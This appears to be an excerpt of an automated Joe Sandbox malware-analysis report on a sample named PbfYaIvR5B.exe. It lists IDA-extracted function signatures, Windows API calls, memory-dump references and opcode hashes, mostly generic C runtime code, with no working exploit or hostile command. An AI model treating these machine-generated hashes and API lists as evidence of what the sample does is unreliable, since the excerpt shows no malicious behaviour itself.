                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: a822a4c0c7ac8acaf809e6074064c875e851203131c5c197f6258060d4df39c1
                                                                                                                    • Instruction ID: 6c1d23ab6f78e0c304639882a798ea9e74257e65faaf1093b3def4bd1c759b14
                                                                                                                    • Opcode Fuzzy Hash: a822a4c0c7ac8acaf809e6074064c875e851203131c5c197f6258060d4df39c1
                                                                                                                    • Instruction Fuzzy Hash: 6BF06831D04208BBEB119FA4DC09B9EBFB5EF48715F0080A9F80DB6251DB3D9E85DA94
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                      • Part of subcall function 0005081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0004F2E4
                                                                                                                    • GetProcAddress.KERNEL32(000881C8,CryptUnprotectMemory), ref: 0004F2F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    • Opcode ID: 4f4fa987bb9e88f22929a6797083fe5d83ec1f056b6d5763b04bfd451db95240
                                                                                                                    • Instruction ID: 3c447291bc27cef7712c6e8ae94b7766e24c4aa7f795e882e5891bb523f24706
                                                                                                                    • Opcode Fuzzy Hash: 4f4fa987bb9e88f22929a6797083fe5d83ec1f056b6d5763b04bfd451db95240
                                                                                                                    • Instruction Fuzzy Hash: D2E04F70D10712AEE7209F34984AB527AD46F04700B14C82DE1DEA7641DABCE5809B56
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: 6e9742ab73e81e336ba13571cc6cd7fdae8285cc2ec38572b4f2f2c14fea919d
                                                                                                                    • Instruction ID: 3698c5f4857881cb6e26165087ed6a53db10f9da85097e87c8ea897f40b8101c
                                                                                                                    • Opcode Fuzzy Hash: 6e9742ab73e81e336ba13571cc6cd7fdae8285cc2ec38572b4f2f2c14fea919d
                                                                                                                    • Instruction Fuzzy Hash: AC512572600A12AFEB288F14D855BBE77E6FF54320F24452DEC05476A2E732ED90D790
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0006BF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006BF5C
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006BF82
                                                                                                                    • _free.LIBCMT ref: 0006BF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006BFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: 370c343e564e6acf1a0b2e8f051eb0aa11858206e0b892d45245505b0e381d7b
                                                                                                                    • Instruction ID: 1779c719e84fd26cd8c2821807b9ce0721a90b7b5693bd46483f2760222c6980
                                                                                                                    • Opcode Fuzzy Hash: 370c343e564e6acf1a0b2e8f051eb0aa11858206e0b892d45245505b0e381d7b
                                                                                                                    • Instruction Fuzzy Hash: 5801D4B2A012157F33212B765C4CDBB7BAEDFC2BA03144139FA08D2111EF658D41D6B0
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,000691AD,0006B188,?,00069813,00000001,00000364,?,00063F73,00000050,?,00081030,00000200), ref: 0006986E
                                                                                                                    • _free.LIBCMT ref: 000698A3
                                                                                                                    • _free.LIBCMT ref: 000698CA
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 000698D7
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00081030,00000200), ref: 000698E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: e3f08ce7e301c3edbd0e34ce58059f65e8ae824c01d43398b1a581841f89e389
                                                                                                                    • Instruction ID: 86c726a45ac3c1aa37e37411280740a344c7c6b59bb938bc952e1a71f7eca18f
                                                                                                                    • Opcode Fuzzy Hash: e3f08ce7e301c3edbd0e34ce58059f65e8ae824c01d43398b1a581841f89e389
                                                                                                                    • Instruction Fuzzy Hash: F90128366446016FE3263374AD85A6F26AFDFD37707200135F509B3593EE398C06A271
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000511CF: ResetEvent.KERNEL32(?), ref: 000511E1
                                                                                                                      • Part of subcall function 000511CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000511F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00050F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00050F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00050F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00050F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00050F6C
                                                                                                                      • Part of subcall function 00050FE4: WaitForSingleObject.KERNEL32(?,000000FF,00051206,?), ref: 00050FEA
                                                                                                                      • Part of subcall function 00050FE4: GetLastError.KERNEL32(?), ref: 00050FF6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: 434ec879fec033063d6e9a18ddef096e0bb1f6c02d439a96978d264194a1664d
                                                                                                                    • Instruction ID: baad11a93576396afa5864905d08bb22a06734e2f739b4f9dc721f927a6905b6
                                                                                                                    • Opcode Fuzzy Hash: 434ec879fec033063d6e9a18ddef096e0bb1f6c02d439a96978d264194a1664d
                                                                                                                    • Instruction Fuzzy Hash: D1017571500B44EFE7229B64DC84BCAFBA9FB08711F000929F65F62560C7797A84DB94
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 0006C817
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 0006C829
                                                                                                                    • _free.LIBCMT ref: 0006C83B
                                                                                                                    • _free.LIBCMT ref: 0006C84D
                                                                                                                    • _free.LIBCMT ref: 0006C85F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: ffac03cc78dbd861e95aecffd679d272b64d926265acef7cdc725e4bdaa23fdd
                                                                                                                    • Instruction ID: 256a550a215189eef965896b401c28c255d5079fd1450d82bfec4408b5289c5c
                                                                                                                    • Opcode Fuzzy Hash: ffac03cc78dbd861e95aecffd679d272b64d926265acef7cdc725e4bdaa23fdd
                                                                                                                    • Instruction Fuzzy Hash: 2AF06232901201AFE670DB69E885C6673EFAB047147548C59F148E7553CF78FC80CB60
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00051FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00051FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00052006
                                                                                                                    • _wcslen.LIBCMT ref: 00052014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0004B371,?,?,00000000,?,?,?), ref: 0005202F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
                                                                                                                    • Opcode ID: 7d77bd174bb1ebc53ac18968f1c397d8a5feb88c3864061af3a514f57218b61b
                                                                                                                    • Instruction ID: 8f6c3da3f372fdc0980eb7d84f7f6cae8ea5c6eda4ad082f83a01e56e0667c73
                                                                                                                    • Opcode Fuzzy Hash: 7d77bd174bb1ebc53ac18968f1c397d8a5feb88c3864061af3a514f57218b61b
                                                                                                                    • Instruction Fuzzy Hash: EBF01D32008114BBDF265F51EC09DCE7F26EF45761B118415FA1A5A0A2CB7296A5D6E0
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 0006891E
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 00068930
                                                                                                                    • _free.LIBCMT ref: 00068943
                                                                                                                    • _free.LIBCMT ref: 00068954
                                                                                                                    • _free.LIBCMT ref: 00068965
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: d84fb9a51c1463aa1f8e525435025a672cb688994e4b8b443473835af61a73d0
                                                                                                                    • Instruction ID: 6a3faf137157fbe2d862ffd0565a157489e2e3e17f6b7e57b333349211c844c7
                                                                                                                    • Opcode Fuzzy Hash: d84fb9a51c1463aa1f8e525435025a672cb688994e4b8b443473835af61a73d0
                                                                                                                    • Instruction Fuzzy Hash: 60F08271912D22ABE6466F2CFC024853FB6F72A7143044766F418622B3CF3D4981DBA1
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    • Opcode ID: 7e25beab4745a3a1288367fde82693646c831d8520be5cfa765c53170fc6781a
                                                                                                                    • Instruction ID: c111928df6c2decebb2aede2b4e039abeabdce10491fb73d1d1c725a24ca3003
                                                                                                                    • Opcode Fuzzy Hash: 7e25beab4745a3a1288367fde82693646c831d8520be5cfa765c53170fc6781a
                                                                                                                    • Instruction Fuzzy Hash: 7A512B7528C304F6F6311AA48D46FFF7265AB09B07F244506FF96640D2CAB2A45CA71E
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PbfYaIvR5B.exe,00000104), ref: 00067FAE
                                                                                                                    • _free.LIBCMT ref: 00068079
                                                                                                                    • _free.LIBCMT ref: 00068083
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                    • API String ID: 2506810119-2694767076
                                                                                                                    • Opcode ID: 78cfe4137e34b71ff3bf835b8ad04563dac1e167eab0912df308ea62889a83a3
                                                                                                                    • Instruction ID: 1648cce84e21795928619329099a674a39d6945c95f9c3cad1516b8904ac8f8c
                                                                                                                    • Opcode Fuzzy Hash: 78cfe4137e34b71ff3bf835b8ad04563dac1e167eab0912df308ea62889a83a3
                                                                                                                    • Instruction Fuzzy Hash: 3831C0B1A00618AFEB61DF98D880DDEBBFDEF85310F108266F50497212DB708E44CB61
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000631FB
                                                                                                                    • _abort.LIBCMT ref: 00063306
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    • Opcode ID: 7e84edcc26c859b4a37cfa70d8e06eb4ca01d0e82bb3d4093eeb558f1ecf3419
                                                                                                                    • Instruction ID: 20909eeec478258b05639b6e5e0e6ef78917b5ded1863193f755f116950dc79b
                                                                                                                    • Opcode Fuzzy Hash: 7e84edcc26c859b4a37cfa70d8e06eb4ca01d0e82bb3d4093eeb558f1ecf3419
                                                                                                                    • Instruction Fuzzy Hash: 4641687190020AAFCF15DF98CC81AEEBBB6BF48304F188059F904A7252D335AA50DB90
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00047406
                                                                                                                      • Part of subcall function 00043BBA: __EH_prolog.LIBCMT ref: 00043BBF
